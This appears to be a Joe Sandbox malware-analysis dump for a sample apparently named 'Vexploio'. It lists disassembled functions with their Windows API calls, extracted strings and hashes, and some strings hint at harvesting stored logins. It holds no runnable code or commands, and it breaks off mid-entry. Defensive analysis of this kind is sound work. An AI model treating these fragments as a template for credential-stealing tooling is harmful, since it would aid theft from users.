                              • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                              • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                              APIs
                              • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                              • GetSystemMetrics.USER32(00000010), ref: 00409F61
                              • GetDC.USER32(00000000), ref: 00409F6E
                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                              • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                              • GetWindowRect.USER32(?,?), ref: 00409FA0
                              • GetParent.USER32(?), ref: 00409FA5
                              • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                              • String ID:
                              • API String ID: 2163313125-0
                              • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                              • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                              • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                              • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@$wcslen
                              • String ID:
                              • API String ID: 239872665-3916222277
                              • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                              • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                              • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                              • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpywcslen$_snwprintfmemset
                              • String ID: %s (%s)$YV@
                              • API String ID: 3979103747-598926743
                              • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                              • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                              APIs
                              • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                              • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Library$AddressFreeLoadMessageProc
                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                              • API String ID: 2780580303-317687271
                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                              APIs
                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                              • wcslen.MSVCRT ref: 0040A6B1
                              • wcscpy.MSVCRT ref: 0040A6C1
                              • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                              • wcscpy.MSVCRT ref: 0040A6DB
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                              • String ID: Unknown Error$netmsg.dll
                              • API String ID: 2767993716-572158859
                              • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                              • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                              APIs
                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                              • wcscpy.MSVCRT ref: 0040DAFB
                              • wcscpy.MSVCRT ref: 0040DB0B
                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: PrivateProfilewcscpy$AttributesFileString
                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                              • API String ID: 3176057301-2039793938
                              • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                              • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                              APIs
                              Strings
                              • out of memory, xrefs: 0042F865
                              • database %s is already in use, xrefs: 0042F6C5
                              • database is already attached, xrefs: 0042F721
                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                              • cannot ATTACH database within transaction, xrefs: 0042F663
                              • unable to open database: %s, xrefs: 0042F84E
                              • too many attached databases - max %d, xrefs: 0042F64D
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpymemset
                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                              • API String ID: 1297977491-2001300268
                              • Opcode ID: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                              • Opcode Fuzzy Hash: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                              APIs
                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                              • memcpy.MSVCRT ref: 0040EB80
                              • memcpy.MSVCRT ref: 0040EB94
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                              • String ID: ($d
                              • API String ID: 1140211610-1915259565
                              • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                              • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                              • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                              • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                              APIs
                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                              • Sleep.KERNEL32(00000001), ref: 004178E9
                              • GetLastError.KERNEL32 ref: 004178FB
                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: File$ErrorLastLockSleepUnlock
                              • String ID:
                              • API String ID: 3015003838-0
                              • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                              • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                              • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                              • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                              APIs
                              • memset.MSVCRT ref: 00407E44
                              • memset.MSVCRT ref: 00407E5B
                              • _mbscpy.MSVCRT ref: 00407E7E
                              • _mbscpy.MSVCRT ref: 00407ED7
                              • _mbscpy.MSVCRT ref: 00407EEE
                              • _mbscpy.MSVCRT ref: 00407F01
                              • wcscpy.MSVCRT ref: 00407F10
                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                              • String ID:
                              • API String ID: 59245283-0
                              • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                              • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                              • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                              • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                              APIs
                              • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                              • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                              • GetLastError.KERNEL32 ref: 0041855C
                              • Sleep.KERNEL32(00000064), ref: 00418571
                              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                              • GetLastError.KERNEL32 ref: 0041858E
                              • Sleep.KERNEL32(00000064), ref: 004185A3
                              • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: File$AttributesDeleteErrorLastSleep$??3@
                              • String ID:
                              • API String ID: 3467550082-0
                              • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                              • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                              • API String ID: 3510742995-3273207271
                              • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                              • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                              • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                              • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                              APIs
                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                              • memset.MSVCRT ref: 00413ADC
                              • memset.MSVCRT ref: 00413AEC
                                • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                              • memset.MSVCRT ref: 00413BD7
                              • wcscpy.MSVCRT ref: 00413BF8
                              • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                              • String ID: 3A
                              • API String ID: 3300951397-293699754
                              • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                              • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                              • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                              • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                              • wcscpy.MSVCRT ref: 0040D1B5
                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                              • wcslen.MSVCRT ref: 0040D1D3
                              • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                              • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                              • memcpy.MSVCRT ref: 0040D24C
                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                              • String ID: strings
                              • API String ID: 3166385802-3030018805
                              • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                              • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                              APIs
                              • memset.MSVCRT ref: 00411AF6
                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                              • wcsrchr.MSVCRT ref: 00411B14
                              • wcscat.MSVCRT ref: 00411B2E
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: FileModuleNamememsetwcscatwcsrchr
                              • String ID: AE$.cfg$General$EA
                              • API String ID: 776488737-1622828088
                              • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                              • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                              • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                              • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                              APIs
                              • memset.MSVCRT ref: 0040D8BD
                              • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                              • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                              • memset.MSVCRT ref: 0040D906
                              • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                              • _wcsicmp.MSVCRT ref: 0040D92F
                                • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                              • String ID: sysdatetimepick32
                              • API String ID: 1028950076-4169760276
                              • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                              • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                              • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                              • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy$memset
                              • String ID: -journal$-wal
                              • API String ID: 438689982-2894717839
                              • Opcode ID: 070149fd6e6b60b17c82d9fb7164138c534913cb2d5c63aa2997da2af33d5e6c
                              • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                              • Opcode Fuzzy Hash: 070149fd6e6b60b17c82d9fb7164138c534913cb2d5c63aa2997da2af33d5e6c
                              • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                              APIs
                              • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                              • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                              • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                              • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                              • EndDialog.USER32(?,00000002), ref: 00405C83
                              • EndDialog.USER32(?,00000001), ref: 00405C98
                                • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                              • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Item$Dialog$MessageSend
                              • String ID:
                              • API String ID: 3975816621-0
                              • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                              • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                              • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                              • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                              APIs
                              • _wcsicmp.MSVCRT ref: 00444D09
                              • _wcsicmp.MSVCRT ref: 00444D1E
                              • _wcsicmp.MSVCRT ref: 00444D33
                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: _wcsicmp$wcslen$_memicmp
                              • String ID: .save$http://$https://$log profile$signIn
                              • API String ID: 1214746602-2708368587
                              • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                              • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
